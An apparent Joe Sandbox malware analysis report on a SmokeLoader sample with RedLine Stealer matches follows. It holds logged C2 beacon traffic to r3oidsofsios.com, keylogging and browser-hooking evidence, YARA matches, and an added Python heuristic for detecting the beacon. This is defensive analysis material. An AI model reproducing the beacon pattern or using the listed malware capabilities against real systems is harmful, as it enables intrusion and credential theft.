encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:38 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 23:12:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
                Source: explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
                Source: explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://go.mail.ru/search
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://nova.rambler.ru/search
                Source: explorer.exe, 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.408629568.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.508519891.0000000001039000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.509151416.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.414672467.0000000000F50000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.508405258.0000000001268000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.509492375.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.508629995.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.425875513.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://r3oidsofsios.com/
                Source: explorer.exe, 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.408629568.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.508519891.0000000001039000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.509151416.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.414672467.0000000000F50000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.508405258.0000000001268000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.509492375.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.508629995.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.425875513.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://r3oidsofsios.com/Mozilla/5.0
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://search.aol.com/aol/search
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://search.yahoo.com/search
                Source: explorer.exe, explorer.exe, 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.google.com/search
                Source: unknown | HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqgkblakc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: r3oidsofsios.com
                Source: unknown | DNS traffic detected: queries for: r3oidsofsios.com
                Source: C:\Windows\SysWOW64\explorer.exe | Code function: 15_2_031D1F2A recv, | 15_2_031D1F2A
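The network evidence above is a C2 beacon, not browsing: a POST to "/" with a form-urlencoded body, a Referer (kqgkblakc.com) on a different host than the Host header (r3oidsofsios.com), an IE11-style User-Agent, and a 404 page that the injected explorer.exe keeps re-requesting (eleven identical responses in four seconds). The following detection heuristic is an added example and not part of the Joe Sandbox report. The sample request and response are re-expanded with CRLF line endings from the report's own "HTTP traffic detected" lines; the benign control message, the indicator names, the Chrome User-Agent string and the threshold of four indicators are this example's assumptions, not anything the report states.

```python
"""Score an HTTP request/response pair against the SmokeLoader-style beacon
recorded in this report. Added example; nothing here is sandbox code."""
import re
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Constructed from the report's evidence lines (CRLF restored).
SAMPLE_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\n"
    "Referer: http://kqgkblakc.com/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Content-Length: 323\r\n"
    "Host: r3oidsofsios.com\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Tue, 29 Nov 2022 23:12:37 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Content-Length: 404\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
)
# Date headers of the eleven 404 responses in the report (3 at :37, 4 at :38, 2 at :39, 2 at :40).
SAMPLE_DATES = (
    ["Tue, 29 Nov 2022 23:12:37 GMT"] * 3
    + ["Tue, 29 Nov 2022 23:12:38 GMT"] * 4
    + ["Tue, 29 Nov 2022 23:12:39 GMT"] * 2
    + ["Tue, 29 Nov 2022 23:12:40 GMT"] * 2
)
# Constructed benign control (assumption): a browser login form post, same-origin Referer, answered 200.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Referer: https://example.com/login\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 42\r\n"
    "\r\n"
)
BENIGN_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"

# The UA in the report ends with the IE11 Trident token; modern browsers never send it.
IE11_UA = re.compile(r"Trident/7\.0; rv:11\.0\) like Gecko$")


def parse_message(raw):
    """Split an HTTP message head into (start line, {lowercased header: value})."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def beacon_indicators(request, response):
    """Return the names of the indicators matched by one request/response pair."""
    start, req = parse_message(request)
    status_line, resp = parse_message(response)
    method, path = start.split(" ")[:2]
    found = []
    if method == "POST" and path == "/":
        found.append("post_to_root")
    if req.get("content-type", "").startswith("application/x-www-form-urlencoded") and req.get("accept") == "*/*":
        found.append("form_body_wildcard_accept")
    ref_host = urlsplit(req.get("referer", "")).hostname
    if ref_host and ref_host != req.get("host", "").split(":")[0].lower():
        found.append("referer_host_mismatch")  # kqgkblakc.com vs r3oidsofsios.com in the report
    if IE11_UA.search(req.get("user-agent", "")):
        found.append("ie11_style_ua")
    if status_line.split(" ")[1] == "404" and resp.get("connection", "").lower() == "close":
        found.append("404_close_response")
    return found


def is_beacon(request, response, threshold=4):
    """Assumed threshold: four of the five indicators together is a beacon."""
    return len(beacon_indicators(request, response)) >= threshold


def retry_burst(dates, min_count=5, window_seconds=10):
    """True if at least min_count responses fall inside any window_seconds span.
    A client that keeps re-POSTing to a URL that answers 404 is retrying a
    protocol, not following a link; a browser stops after the first 404."""
    times = sorted(parsedate_to_datetime(d) for d in dates)
    for i in range(len(times) - min_count + 1):
        if (times[i + min_count - 1] - times[i]).total_seconds() <= window_seconds:
            return True
    return False


if __name__ == "__main__":
    print(beacon_indicators(SAMPLE_REQUEST, SAMPLE_RESPONSE), retry_burst(SAMPLE_DATES))
    print(beacon_indicators(BENIGN_REQUEST, BENIGN_RESPONSE))
```

The individual checks are weak on their own (plenty of legitimate sites answer 404 with Connection: close, and old enterprise agents still send a Trident UA); the value is in the conjunction and in the retry burst, which is what separates the report's traffic from a user who simply hit a dead link. In a proxy or Zeek pipeline the same logic would be applied per client/destination pair rather than per message.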

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara match | File source: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1836, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4584, type: MEMORYSTR
                Source: Yara match | File source: 9.2.jdggfai.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.3.jdggfai.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.file.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.jdggfai.6d0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000003.388354905.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.245341240.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_007D162B GetKeyboardState,ToUnicode, | 16_2_007D162B

                E-Banking Fraud

                Source: C:\Windows\SysWOW64\explorer.exe | Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, firefox.exe, iexplore.exe, microsoftedgecp.exe, chrome.exe (one evidence entry per browser process name, same function) | 10_2_00CE38EA
                Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_0057226C CreateDesktopW,SetThreadDesktop,RtlZeroMemory,RtlZeroMemory,CreateProcessW,ResumeThread, | 20_2_0057226C

                System Summary

                Source: 00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.346601770.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.346812958.000000000060A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.406779661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000E.00000000.417608043.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000009.00000002.407040058.0000000000748000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
